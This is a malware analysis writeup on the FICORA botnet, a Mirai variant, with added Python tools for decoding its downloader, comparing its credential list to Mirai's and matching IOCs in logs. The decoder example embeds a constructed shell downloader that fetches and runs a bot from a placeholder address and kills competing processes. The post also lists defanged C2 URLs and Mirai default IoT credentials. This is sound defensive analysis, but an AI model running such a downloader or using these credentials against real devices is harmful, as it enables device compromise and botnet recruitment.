Botnets continue to exploit vulnerabilities: FICORA botnet analysis
Summary
On December 26, 2024, FortiGuard Labs reported a new variant called "FICORA". It spreads mainly through already-documented D-Link vulnerabilities that let a remote attacker execute commands on the device. The attacker uses that foothold to download the malware, and the bot then runs brute-force attacks and DDoS flooding attacks from the victim host.
Analysis
Why is the botnet called "FICORA"?
The bot takes its name from a string embedded in the malware itself.
Figure1- special strings
The downloader shell script tries several fetch methods in turn (wget, ftpget, tftp and curl) to retrieve the FICORA binary, so the download still succeeds on a device that has only one of those tools.
Figure2- downloader with multiple strategies for fetching the malware
The shell script also kills (kill -9) every process with the same file extension as the bot binaries, a common way for a bot to remove earlier or competing infections.
Figure3- downloader with kill -9 command
The shell script further looks for and kills any process whose name contains the keyword "dvrHelper". This part of the script is stored as hexadecimal and only becomes readable once decoded to text; a small excerpt is shown below, first as stored and then decoded.
Figure4- malware script stored as hexadecimal
Figure5- the same script decoded to plain text
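The decode step above is easy to script. The following is an added example (not code from the post or from the FICORA sample): it decodes a hex-encoded downloader, then pulls out the fetch tools, URLs, hosts, dropped file names and kill keywords an analyst wants, and defangs URLs in the style of the IOC list. The sample script is constructed to mirror the structure described above (several fetch strategies, kill-by-keyword); it uses the RFC 5737 documentation address 192.0.2.10 rather than any real C2.

```python
"""Decode a hex-encoded downloader script and pull out its indicators.

Added example, not code from the original post or from the FICORA sample.
The script below is constructed for illustration: it mirrors the structure
the post describes (several fetch strategies, kill-by-keyword) but uses the
documentation address 192.0.2.10 (RFC 5737) rather than any real C2.
"""
import re

# Constructed sample downloader script (plain text).
PLAIN_SAMPLE = (
    "#!/bin/sh\n"
    "cd /tmp || cd /var/run\n"
    "wget http://192.0.2.10/la.bot.arm7 -O dlr.arm7 || "
    "curl -o dlr.arm7 http://192.0.2.10/la.bot.arm7 || "
    "tftp -g -r la.bot.arm7 192.0.2.10 || "
    "ftpget -u anonymous -p anonymous 192.0.2.10 dlr.arm7 la.bot.arm7\n"
    "chmod 777 dlr.arm7\n"
    "for p in $(ps | grep dvrHelper | grep -v grep | awk '{print $1}'); "
    "do kill -9 $p; done\n"
    "./dlr.arm7\n"
)
# The same script hex-encoded (two hex digits per byte), the form in which
# the post's Figure 4 shows the real one.
HEX_SAMPLE = PLAIN_SAMPLE.encode().hex()


def decode_hex_script(blob: str) -> str:
    """Turn a hex-encoded script back into text.

    Accepts either a bare hex string (whitespace tolerated) or the
    shell-escape form "\\x23\\x21..." typically fed to echo -e or printf.
    """
    escaped = re.findall(r"\\x([0-9a-fA-F]{2})", blob)
    if escaped:
        raw = bytes.fromhex("".join(escaped))
    else:
        raw = bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", blob))
    return raw.decode("utf-8", errors="replace")


def extract_indicators(script: str) -> dict:
    """Collect the pieces an analyst wants from a decoded downloader."""
    urls = set(re.findall(r"https?://[^\s\"'|;]+", script))
    hosts = set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", script))
    tools = set(re.findall(r"\b(wget|curl|tftp|ftpget)\b", script))
    # Names the script greps/pkills for: these are the processes it kills.
    kills = set(re.findall(
        r"(?:grep|pkill|killall)\s+(?:-\w+\s+)*([A-Za-z][\w.]*)", script))
    kills.discard("grep")
    # Output file names given to wget -O / curl -o.
    dropped = set(re.findall(r"(?:-O|-o)\s+(\S+)", script))
    return {"urls": urls, "hosts": hosts, "fetch_tools": tools,
            "kill_keywords": kills, "dropped_files": dropped}


def defang(url: str) -> str:
    """Render a URL in the hxxp://1[.]2[.]3[.]4/path style used in IOC lists."""
    scheme, rest = url.split("://", 1)
    netloc, slash, path = rest.partition("/")
    return (scheme.replace("http", "hxxp") + "://"
            + netloc.replace(".", "[.]") + slash + path)


if __name__ == "__main__":
    decoded = decode_hex_script(HEX_SAMPLE)
    print(decoded)
    for name, values in extract_indicators(decoded).items():
        print(f"{name}: {sorted(values)}")
    print(defang("http://192.0.2.10/la.bot.arm7"))
```

Run it on a real downloader by passing the hex blob from the script (or the `\xNN` argument to `echo -e`) to `decode_hex_script`; the extracted kill keywords and fetch URLs are what you would then pivot on in the IOC section.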
The keyword "dvrHelper" is familiar from the Mirai family: Mirai loader binaries (for example dlr.arm7) contain the same string, as shown below.
Figure6- loader binary, e.g. dlr.arm7
FICORA brute-forces logins using a username and password list embedded in the binary.
Figure7- brute force attack function with embedded username and password list
The default credentials embedded in FICORA are very similar to those in Mirai.
Figure8- username and password comparison
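The credential comparison in Figure 8 can be done mechanically. What follows is an added example, not code from the post or from FICORA or Mirai: it extracts a table of NUL-terminated username/password strings from a binary blob, tries both a plaintext view and a view XORed with 0x22 (the leaked Mirai scanner.c applies its 0xDEADBEEF key one byte at a time, and 0xDE ^ 0xAD ^ 0xBE ^ 0xEF == 0x22), picks the alignment that best matches a reference subset of Mirai's defaults, and reports the overlap. The page does not say how FICORA stores its list, so the table layout and the XOR option are assumptions, and the sample blob is constructed.

```python
"""Recover an embedded credential table from a bot binary and measure its
overlap with Mirai's defaults.

Added example, not code from the original post or from FICORA/Mirai.
Assumptions (the page does not state them): the table is a run of
NUL-terminated username/password strings in order, stored either as plain
text or XORed byte-wise with 0x22 as in the leaked Mirai scanner.c. The
sample blob below is constructed.
"""
import re

# Subset of the default credentials from the leaked Mirai scanner.c (2016).
MIRAI_DEFAULTS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"),
    ("admin", "admin"), ("root", "888888"), ("root", "xmhdipc"),
    ("root", "default"), ("root", "juantech"), ("root", "123456"),
    ("root", "54321"), ("support", "support"), ("root", "root"),
    ("admin", "password"), ("user", "user"), ("ubnt", "ubnt"),
    ("root", "7ujMko0vizxv"), ("root", "7ujMko0admin"), ("admin", "1234"),
}
MIRAI_XOR_KEY = 0x22  # 0xDE ^ 0xAD ^ 0xBE ^ 0xEF


def extract_strings(blob: bytes, xor_key: int = 0, min_len: int = 3) -> list:
    """strings(1)-style extraction after an optional single-byte XOR.

    The NUL terminating each stored string is not XORed in the binary, so
    in the XORed view it appears as the key byte; map it back to NUL first.
    """
    data = bytes(b ^ xor_key for b in blob).replace(bytes([xor_key]), b"\x00")
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def pair_credentials(strings: list, offset: int = 0) -> set:
    """Pair consecutive strings as (username, password) starting at offset."""
    return {(strings[i], strings[i + 1]) for i in range(offset, len(strings) - 1, 2)}


def recover_credential_table(blob: bytes) -> tuple:
    """Try plain and XOR-0x22 views at both pairing alignments and keep the
    one that best matches the reference list. The alignment step absorbs
    stray strings (ELF header text, symbol names) that precede the table."""
    best, best_score = (0, 0, set()), -1
    for key in (0, MIRAI_XOR_KEY):
        strings = extract_strings(blob, key)
        for offset in (0, 1):
            pairs = pair_credentials(strings, offset)
            score = len(pairs & MIRAI_DEFAULTS)
            if score > best_score:
                best, best_score = (key, offset, pairs), score
    return best


def compare_with_mirai(pairs: set) -> dict:
    """Overlap statistics against the Mirai reference list."""
    shared = pairs & MIRAI_DEFAULTS
    union = pairs | MIRAI_DEFAULTS
    return {"shared": len(shared), "total": len(pairs),
            "jaccard": len(shared) / len(union) if union else 0.0,
            "new": sorted(pairs - MIRAI_DEFAULTS)}


# Constructed sample table: six Mirai defaults plus one made-up entry.
SAMPLE_TABLE = [
    ("root", "xc3511"), ("root", "vizxv"), ("admin", "admin"),
    ("support", "support"), ("root", "7ujMko0admin"),
    ("admin", "changeme"), ("user", "user"),
]


def build_sample_blob(table: list, xor_key: int) -> bytes:
    """Constructed stand-in for a bot binary: fake ELF header, padding, table."""
    body = b"".join(bytes(c ^ xor_key for c in s.encode()) + b"\x00"
                    for pair in table for s in pair)
    return b"\x7fELF" + b"\xff" * 12 + body + b"\xff" * 4


SAMPLE_BLOB = build_sample_blob(SAMPLE_TABLE, MIRAI_XOR_KEY)

if __name__ == "__main__":
    key, offset, pairs = recover_credential_table(SAMPLE_BLOB)
    print(f"view: xor 0x{key:02x}, alignment {offset}, {len(pairs)} pairs")
    print(compare_with_mirai(pairs))
```

Against a real sample, read the file with `open(path, "rb").read()` and pass it to `recover_credential_table`; a high `shared` count with a short `new` list is the kind of evidence Figure 8 presents visually.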
FICORA and Mirai also share multiple similar code structures.
Figure8- structure comparison
Figure9- structure comparison
Diffing the FICORA binary against Mirai finds matching functions of the same design, for example the counterpart of Mirai's attack_method_udpplain, which scores 53% similarity at 64% confidence.
Figure10- DDoS in UDP
IOCs
Downloader script md5: cb9f5c8892bffc28f6c12f11d60f5c92
Downloader URLs:
hxxp://103[.]149[.]87[.]69/multi
hxxp://103[.]149[.]87[.]69/la.bot.arc
hxxp://103[.]149[.]87[.]69/la.bot.arm
hxxp://103[.]149[.]87[.]69/la.bot.arm5
hxxp://103[.]149[.]87[.]69/la.bot.arm6
hxxp://103[.]149[.]87[.]69/la.bot.arm7
hxxp://103[.]149[.]87[.]69/la.bot.m68k
hxxp://103[.]149[.]87[.]69/la.bot.mips
hxxp://103[.]149[.]87[.]69/la.bot.mipsel
hxxp://103[.]149[.]87[.]69/la.bot.powerpc
hxxp://103[.]149[.]87[.]69/la.bot.sh4
hxxp://103[.]149[.]87[.]69/la.bot.sparc
FICORA bot binary md5: 233A1A71307FD7CA5946D90D6977E97A
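To turn this list into a detection, the following added example (not code from the post) refangs the IOC URLs above, matches them and their host against log lines, and checks file hashes against the two MD5s. The log lines are constructed in a minimal "timestamp client method target status" proxy format; everything that is not an IOC uses 10.0.0.0/8, RFC 5737 or RFC 2606 addresses.

```python
"""Match the post's network and file IOCs against proxy/firewall logs.

Added example, not code from the original post. The IOC values are those
listed above, copied in defanged form; the log lines are constructed.
"""
import re
from urllib.parse import urlparse

IOC_URLS_DEFANGED = [
    "hxxp://103[.]149[.]87[.]69/multi",
    "hxxp://103[.]149[.]87[.]69/la.bot.arc",
    "hxxp://103[.]149[.]87[.]69/la.bot.arm",
    "hxxp://103[.]149[.]87[.]69/la.bot.arm5",
    "hxxp://103[.]149[.]87[.]69/la.bot.arm6",
    "hxxp://103[.]149[.]87[.]69/la.bot.arm7",
    "hxxp://103[.]149[.]87[.]69/la.bot.m68k",
    "hxxp://103[.]149[.]87[.]69/la.bot.mips",
    "hxxp://103[.]149[.]87[.]69/la.bot.mipsel",
    "hxxp://103[.]149[.]87[.]69/la.bot.powerpc",
    "hxxp://103[.]149[.]87[.]69/la.bot.sh4",
    "hxxp://103[.]149[.]87[.]69/la.bot.sparc",
]
IOC_MD5 = {
    "cb9f5c8892bffc28f6c12f11d60f5c92": "FICORA downloader script",
    "233a1a71307fd7ca5946d90d6977e97a": "FICORA bot binary",
}


def refang(ioc: str) -> str:
    """Undo the hxxp / [.] defanging so values compare against real logs."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


IOC_URLS = {refang(u) for u in IOC_URLS_DEFANGED}
IOC_HOSTS = {urlparse(u).hostname for u in IOC_URLS}


def scan_log_line(line: str) -> list:
    """Return (kind, indicator) hits for one log line: exact URL matches
    first, then any bare IOC host (catches CONNECT and non-HTTP fetches)."""
    hits = []
    for url in re.findall(r'https?://[^\s"]+', line):
        if url in IOC_URLS:
            hits.append(("url", url))
    for ip in re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", line):
        if ip in IOC_HOSTS:
            hits.append(("host", ip))
    return hits


def scan_logs(lines) -> list:
    """Scan lines of 'timestamp client method target status' (constructed
    format); the client field identifies the possibly infected device."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = scan_log_line(line)
        if hits:
            findings.append({"line": n, "client": line.split()[1], "hits": hits})
    return findings


def lookup_hash(md5: str):
    """Case-insensitive lookup of a file's MD5 against the IOC hashes."""
    return IOC_MD5.get(md5.strip().lower())


# Constructed log lines: two hits (a download and a bare CONNECT), two clean.
SAMPLE_LOG = """\
2024-12-26T10:01:02Z 10.0.0.5 GET http://103.149.87.69/la.bot.arm7 200
2024-12-26T10:01:03Z 10.0.0.5 GET http://example.org/index.html 200
2024-12-26T10:02:11Z 10.0.0.7 CONNECT 103.149.87.69:80 200
2024-12-26T10:03:45Z 10.0.0.9 GET http://198.51.100.4/update.bin 404
"""

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']} client {f['client']}: {f['hits']}")
    print(lookup_hash("233A1A71307FD7CA5946D90D6977E97A"))
```

Matching on the bare host as well as the full URL matters here: the per-architecture file names change between campaigns, but a device reaching the downloader host at all is the signal worth alerting on.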
Conclusion
With high confidence, the malware "FICORA" is a variant of the Mirai family. It can be identified by the multiple code structures it shares with Mirai.
End.